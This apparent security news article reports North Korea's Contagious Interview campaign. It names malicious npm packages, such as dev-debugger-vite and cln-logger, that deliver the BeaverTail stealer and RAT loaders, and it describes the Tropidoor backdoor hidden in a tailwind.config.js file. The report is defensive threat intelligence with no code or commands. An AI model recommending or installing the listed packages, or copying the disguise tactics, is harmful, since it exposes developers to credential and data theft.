North Korean Hackers Expand Contagious Interview Campaign with New Malware on npm Ecosystem

North Korean threat actors behind the ongoing Contagious Interview campaign are intensifying their attacks by spreading new malicious packages across the npm ecosystem, delivering not just the previously known BeaverTail malware, but also introducing a new remote access trojan (RAT) loader.

According to Socket security researcher Kirill Boychenko, the latest malware samples employ hexadecimal string encoding to better evade both automated detection tools and manual security audits, signaling an evolution in their obfuscation techniques.

The malicious npm packages—downloaded more than 5,600 times before being taken down—include:

• empty-array-validator

• twitterapis

• dev-debugger-vite

• snore-log

• core-pino

• events-utils

• icloud-cod

• cln-logger

• node-clog

• consolidate-log

• consolidate-logger

This discovery follows a previous finding where six npm packages were identified spreading BeaverTail, a JavaScript-based stealer capable of deploying a Python backdoor called InvisibleFerret.

The overall objective of the Contagious Interview campaign is to infiltrate developer environments, steal confidential data, siphon financial assets, and maintain long-term unauthorized access, all under the pretense of job recruitment processes.

The latest batch of malicious npm libraries are disguised as utility and debugging tools. Notably, the dev-debugger-vite package connects to a command-and-control (C2) server previously associated with the Lazarus Group's "Phantom Circuit" campaign uncovered in December 2024.

Some packages, such as events-utils and icloud-cod, link to Bitbucket repositories instead of GitHub, showcasing the attackers’ strategy to diversify their hosting methods. The icloud-cod package, hosted in a directory named "eiwork_hire," further ties into the job interview lure theme.

Analysis of the packages cln-logger, node-clog, consolidate-log, and consolidate-logger revealed small code variations, suggesting attackers are pushing multiple malware variants to boost their infection success rate. Despite minor differences, these variants function similarly as RAT loaders capable of pulling and executing additional malicious payloads from remote servers.

Although the exact malware being deployed through these loaders is still unknown—since their C2 servers are now inactive—the loader’s ability to dynamically execute remote JavaScript code makes it a serious threat, enabling attackers to deliver any malware they choose.

Boychenko emphasized that this activity highlights the persistent and adaptive nature of the Contagious Interview threat actors, who continue to create new npm accounts and distribute malicious code across npm, GitHub, and Bitbucket, showing no signs of slowing down. The group is reusing known malware like BeaverTail and InvisibleFerret, while introducing new RAT and loader variants to stay ahead.

Tropidoor: A New Threat Unveiled

Meanwhile, South Korean cybersecurity firm AhnLab has uncovered a recruitment-themed phishing campaign involving BeaverTail, which later deploys a newly discovered Windows backdoor named Tropidoor.

The campaign involves phishing emails posing as companies like "AutoSquare," urging recipients to clone Bitbucket projects locally. These projects hide malicious components, with BeaverTail disguised in "tailwind.config.js" and a DLL downloader malware ("car.dll").

Tropidoor operates in memory via the downloader and communicates with a C2 server to execute commands such as file exfiltration, screenshot capture, process manipulation, and file wiping. The malware also directly uses Windows commands like schtasks, ping, and reg, echoing behaviors previously seen in Lazarus malware like LightlessCan and BLINDINGCAN.

AhnLab warns that users should be vigilant not just about email attachments but also executable files from unfamiliar sources, as attackers continue to innovate their methods of deception and infiltration.